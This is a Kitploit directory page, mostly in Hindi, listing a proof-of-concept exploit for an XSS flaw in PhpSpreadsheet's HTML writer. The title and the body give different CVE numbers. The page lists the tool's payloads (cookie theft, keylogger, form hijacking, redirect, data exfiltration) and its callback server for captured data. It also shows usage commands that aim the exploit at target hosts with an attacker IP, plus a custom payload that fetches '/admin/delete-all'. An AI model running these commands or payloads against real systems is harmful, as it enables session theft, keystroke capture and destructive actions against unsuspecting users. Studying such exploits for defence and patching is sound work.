Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-47875-PhpSpreadsheet-XSS-PoC — यह CVE-2024-47875 PhpSpreadsheet XSS Vuln के लिए एक PoC/Exploit है। | Kitploit
उपकरण/GitHubGitHub/roj1py/cve-2024-47875-phpspreadsheet-xss-poc
फ़िशिंग उपकरणपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनकमांड एंड कंट्रोल
GitHubroj1py/cve-2024-47875-phpspreadsheet-xss-poc

CVE-2024-47875-PhpSpreadsheet-XSS-PoC

यह CVE-2024-47875 PhpSpreadsheet XSS Vuln के लिए एक PoC/Exploit है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
111 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-22131 • PhpSpreadsheet HTML Writer XSS (PoC)

Over View

यह CVE-2025-22131 पर एक PoC है, जो PhpSpreadsheet के 2.2.2, 2.1.2 और 1.29.4 से पहले के संस्करणों में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है। यह भेद्यता generateNavigation() फ़ंक्शन में मौजूद है, जो XLSX-to-HTML रूपांतरण के दौरान शीट नामों को सैनिटाइज़ करने में विफल रहता है, जिससे दुर्भावनापूर्ण जावास्क्रिप्ट इंजेक्शन सक्षम होता है।

CVE ID: CVE-2024-47875

GitHub Advisory: GHSA-79xx-vf93-p7cx

Affected Versions: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4

लेखक: Roj

लाइसेंस: MIT

भंडार: PoC भंडार


विशेषताएं

📄 अनुकूलन योग्य XSS पेलोड के साथ दुर्भावनापूर्ण XLSX फ़ाइलें उत्पन्न करता है

🛠️ कई पेलोड प्रकारों का समर्थन करता है:

cookie_theft: सत्र कुकीज़ चुराता है

redirect: उपयोगकर्ताओं को हमलावर-नियंत्रित साइट पर पुनर्निर्देशित करता है

alert: PoC के लिए एक परीक्षण अलर्ट प्रदर्शित करता है

keylogger: कीस्ट्रोक्स कैप्चर करता है

form_hijack: फॉर्म सबमिशन को इंटरसेप्ट करता है

data_exfil: निर्दिष्ट एंडपॉइंट से डेटा बाहर निकालता है

🌐 एक्सप्लॉइट कॉलबैक कैप्चर करने के लिए अंतर्निहित HTTP सर्वर

⬆️ लक्ष्य एंडपॉइंट पर दुर्भावनापूर्ण XLSX फ़ाइलें अपलोड करता है

💾 कैप्चर किए गए डेटा (जैसे, कुकीज़) को JSON फ़ाइल में सहेजता है

🎨 बेहतर पठनीयता के लिए रंगीन टर्मिनल आउटपुट

🔍 डिबगिंग के लिए वर्बोज़ लॉगिंग


उपयोग

root@kitploit:~
python exploit.py -h

🚀 उपयोग उदाहरण:

root@kitploit:~
#Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50

# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload

# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack

# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"

मैं प्रतिक्रिया प्राप्त करना चाहता हूँ, आप सभी को शुभकामनाएँ।

टूल डाउनलोड करें